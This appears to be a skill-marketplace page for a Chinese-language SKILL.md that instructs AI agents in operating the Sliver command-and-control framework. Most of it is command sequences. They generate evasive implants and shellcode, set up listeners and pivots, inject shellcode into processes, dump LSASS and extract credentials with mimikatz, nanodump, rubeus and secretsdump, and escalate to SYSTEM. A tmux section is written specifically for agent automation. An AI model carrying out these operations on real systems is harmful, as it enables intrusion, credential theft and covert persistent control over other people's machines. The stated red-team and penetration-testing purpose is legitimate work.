wgpsec/sliver-c2
skills/evasion/sliver-c2/SKILL.md
Sliver C2 框架操作指南。当需要建立命令与控制通道、管理植入体、进行后渗透操作时使用。支持 mTLS/HTTPS/DNS/WireGuard 多协议、Session/Beacon 双模式、SOCKS5 代理、TCP/Named Pipe 多层穿透。适用于红队行动和渗透测试场景。
$ install --global
skillsauthnpx skillsauth add wgpsec/AboutSecurity sliver-c2Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 25, 2026, 9:42 PM1.8s1 file scanned
SKILL.md
- name:
- sliver-c2
- description:
- Sliver C2 框架操作指南。当需要建立命令与控制通道、管理植入体、进行后渗透操作时使用。支持 mTLS/HTTPS/DNS/WireGuard 多协议、Session/Beacon 双模式、SOCKS5 代理、TCP/Named Pipe 多层穿透。适用于红队行动和渗透测试场景。
- tags:
- sliver,c2,command-and-control,implant,beacon,session,mtls,socks5,pivoting,named-pipe,post-exploitation,bof
- category:
- evasion
Sliver C2 框架操作指南
Sliver 是开源跨平台 C2 框架,支持多协议通信 (mTLS/HTTPS/HTTP/DNS/WireGuard)、Session/Beacon 双模式、端口转发/SOCKS5/TCP Pivot/Named Pipe Pivot 穿透能力、Armory 扩展生态与 BOF/COFF 执行。
Phase 1: 环境准备
# 安装
curl https://sliver.sh/install | sudo bash
sliver-server # 启动服务端
sliver-client # 客户端连接
tmux 非交互式操作 (AI Agent 场景)
tmux new-session -d -s sliver "/path/to/sliver-client console"
sleep 5
tmux send-keys -t sliver "version" Enter
sleep 2
tmux capture-pane -t sliver -p | tail -20 # 捕获输出
tmux send-keys -t sliver "generate --mtls 10.0.0.164:8888 --os linux --save /tmp/implant" Enter
sleep 120 # 等待编译
tmux capture-pane -t sliver -p # 查看结果
tmux kill-session -t sliver # 关闭
基本命令
sliver > version # 版本
sliver > jobs # 运行中的监听器
sliver > implants # 已生成的 implant
sliver > sessions # 活跃会话
sliver > beacons # 活跃 beacon
Phase 2: Listener 配置
sliver > mtls # mTLS (推荐)
sliver > mtls --lhost 192.168.1.100 --lport 8888
sliver > https --domain example.com # HTTPS
sliver > https --domain example.com --lets-encrypt # HTTPS + 自动证书
sliver > https --domain example.com --website fake-blog # HTTPS + 静态伪装
sliver > http # HTTP
sliver > dns --domains 1.example.com. # DNS (FQDN 末尾带点)
sliver > wg # WireGuard
sliver > jobs # 查看监听器
sliver > jobs -k JOB_ID # 停止监听器
协议对比
+------------+--------+----------------+------+--------+------------------+
| 协议 | 默认端口 | 加密方式 | 速度 | 隐蔽性 | 推荐场景 |
+------------+--------+----------------+------+--------+------------------+
| mTLS | 8888 | TLS 双向认证 | 快 | 中 | 内网/可控环境 |
| HTTPS | 443 | TLS | 中 | 高 | 出网受限环境 |
| HTTP | 80 | 应用层加密 | 中 | 中 | 代理环境 |
| DNS | 53 | 应用层加密 | 慢 | 高 | 高度受限网络 |
| WireGuard | 53/UDP | WireGuard | 快 | 中 | 需要端口转发 |
+------------+--------+----------------+------+--------+------------------+
-> references/c2-protocols.md
Phase 3: Implant 生成
Session vs Beacon
| 特性 | Session | Beacon |
|------|---------|--------|
| 通信 | 实时持久连接 | 定期轮询 (默认 60s) |
| 隐蔽性 | 较低 | 较高 |
| shell/portfwd/pivot | 直接支持 | 需 interactive 切换 |
| 适用 | 交互操作 | 长期潜伏 |
生成命令
# Session 模式
sliver > generate --mtls example.com --os windows --arch amd64 --save /tmp
# Beacon 模式
sliver > generate beacon --mtls example.com --os windows --seconds 30 --jitter 10 --save /tmp
# 多协议备份
sliver > generate --mtls example.com --http backup.com --dns 1.dns.com.
# 输出格式: exe / shared (DLL/SO) / shellcode / service (Windows 服务)
sliver > generate --mtls example.com --format shellcode --save /tmp
规避选项
sliver > generate --mtls example.com --limit-datetime "2024-12-31" # 限制执行时间
sliver > generate --mtls example.com --limit-domainjoined # 仅域加入机器
sliver > generate --mtls example.com --limit-hostname "TARGET-PC" # 限制主机名
sliver > generate --mtls example.com --limit-username "admin" # 限制用户名
-> references/implant-generation.md
Phase 4: Session 管理
交互
sliver > use SESSION_ID # 使用会话
sliver (BEACON) > interactive # Beacon 切换到 Session
sliver (SESSION) > close # 关闭会话
文件操作
sliver (SESSION) > ls / cd / pwd / cat # 文件系统导航
sliver (SESSION) > download /remote/file /local # 下载
sliver (SESSION) > upload /local/file /remote # 上传
sliver (SESSION) > mkdir /path && rm /path # 创建/删除
进程管理
sliver (SESSION) > ps # 列出进程
sliver (SESSION) > ps -e "lsass" # 按名称过滤
sliver (SESSION) > kill PID # 终止进程
sliver (SESSION) > procdump -p PID -s /tmp/proc.dmp # 进程转储
命令执行
sliver (SESSION) > shell # 交互式 shell (仅 Session)
sliver (SESSION) > execute -o whoami # 执行并返回输出
sliver (SESSION) > execute -o "cmd /c dir"
sliver (SESSION) > msf -m payload/windows/x64/exec # Metasploit 集成
Phase 5: 网络穿透
端口转发
sliver (SESSION) > portfwd add --remote 10.10.10.10:3389 # 本地转发
sliver (SESSION) > portfwd add --bind 0.0.0.0:1234 --remote 10.10.10.10:22
sliver (SESSION) > rportfwd add --remote 0.0.0.0:8080 --local 127.0.0.1:80 # 反向转发
sliver (SESSION) > wg-portfwd add --remote 10.10.10.10:3389 # WireGuard 转发
sliver (SESSION) > portfwd rm ID # 删除
SOCKS5 代理 + proxychains4
sliver (SESSION) > socks5 start --port 1080
sudo sed -i 's/^socks4.*/socks5 127.0.0.1 1080/' /etc/proxychains4.conf
proxychains4 -q nmap -sT -Pn -p 445,389,88 192.168.56.0/24
proxychains4 -q netexec smb 192.168.56.0/24
proxychains4 -q secretsdump.py domain/user:[email protected]
TCP Pivot (多层内网)
sliver (EDGE_SESSION) > pivots tcp --bind 0.0.0.0:9898 # 边界机器启动 pivot
sliver > generate --tcp-pivot 10.10.10.5:9898 --save /tmp # 生成 pivot implant
sliver (EDGE_SESSION) > upload /tmp/IMPLANT C:\Windows\Temp\ # 上传执行
sliver (EDGE_SESSION) > execute C:\Windows\Temp\IMPLANT
Named Pipe Pivot (同网段隐蔽)
sliver (SESSION) > pivots named-pipe --bind mypipe --allow-all
sliver > generate --named-pipe 192.168.1.100/pipe/mypipe --save /tmp
-> references/pivoting-proxy.md
Phase 6: 后渗透
进程注入
sliver (SESSION) > migrate PID # 迁移进程
sliver (SESSION) > execute-shellcode -p PID /path/to/shellcode.bin # Shellcode 注入
sliver (SESSION) > execute-assembly /path/to/assembly.exe arg1 # .NET 内存加载
凭据操作
sliver > armory install nanodump
sliver (SESSION) > nanodump # LSASS 转储
sliver > armory install rubeus
sliver (SESSION) > rubeus triage / kerberoast / asreproast # Kerberos 操作
sliver > armory install mimikatz
sliver (SESSION) > mimikatz "sekurlsa::logonpasswords" # 凭据提取
权限提升
sliver (SESSION) > getsystem # 获取 SYSTEM
sliver (SESSION) > impersonate USERNAME # 模拟用户
sliver (SESSION) > rev2self # 恢复原始 token
Armory 扩展与 BOF 执行
sliver > armory # 列出可用扩展
sliver > armory install coff-loader # BOF 加载器
sliver > armory install rubeus nanodump seatbelt sharphound sharpwmi
sliver > armory install all # 安装所有
sliver > extensions # 查看已安装
sliver (SESSION) > nanodump -h # BOF 帮助
sliver (SESSION) > rubeus kerberoast # 直接调用 BOF
-> references/post-exploitation.md
决策树
需要建立 C2 通道?
|
+-- 网络环境评估
| |
| +-- 内网/可控环境 ---------> mTLS (最快最稳)
| +-- 出网受限/有代理 -------> HTTPS (代理感知)
| +-- 仅 DNS 出网 -----------> DNS (慢但隐蔽)
| +-- 需要高效隧道 ----------> WireGuard
| +-- 不确定 ----------------> 多协议备份 (mTLS + HTTPS + DNS)
|
+-- 选择 Implant 模式
| |
| +-- 需要实时交互? ---------> Session (shell/portfwd/socks5)
| +-- 需要长期潜伏? ---------> Beacon (--seconds/--jitter)
|
+-- 需要访问内网资源?
| |
| +-- 单个端口 --------------> portfwd add
| +-- 多个端口/扫描 ---------> socks5 start + proxychains4
| +-- 目标无法出网 ----------> TCP Pivot
| +-- 同网段横向 (Windows) --> Named Pipe Pivot
|
+-- 后渗透操作
|
+-- 需要凭据 --------------> nanodump / rubeus / mimikatz BOF
+-- 需要持久化 ------------> migrate 到稳定进程
+-- 需要执行 .NET 工具 ----> execute-assembly
+-- 需要 BOF 扩展 ---------> armory install + 直接调用
工具清单
| 工具 | 用途 | |------|------| | sliver-server | C2 服务端 | | sliver-client | 操作员客户端 | | wg-quick | WireGuard 客户端 | | tmux | 非交互式脚本集成 | | proxychains4 | SOCKS 代理工具链路由 |
参考文档
- -> references/c2-protocols.md - C2 协议配置详解
- -> references/implant-generation.md - Implant 生成详解
- -> references/pivoting-proxy.md - 网络穿透与代理
- -> references/post-exploitation.md - 后渗透操作
Related Skills
wgpsec/azure-pentesting
testing
VerifiedTrustedCommunity
Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产(Blob Storage/App Service/Azure VM/Azure Functions)、获取 Azure 凭据(Service Principal/Managed Identity/Access Token)、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面
1,393SKILL.mdUpdated Apr 24, 2026
wgpsec/mythic-c2
tools
VerifiedTrustedCommunity
Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务,或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断
1,345SKILL.mdUpdated May 22, 2026
wgpsec/docker-pentesting
development
VerifiedTrustedCommunity
Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能
1,345SKILL.mdUpdated May 22, 2026
wgpsec/padbuster-padding-oracle
development
VerifiedTrustedCommunity
使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文,适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能
1,345SKILL.mdUpdated May 6, 2026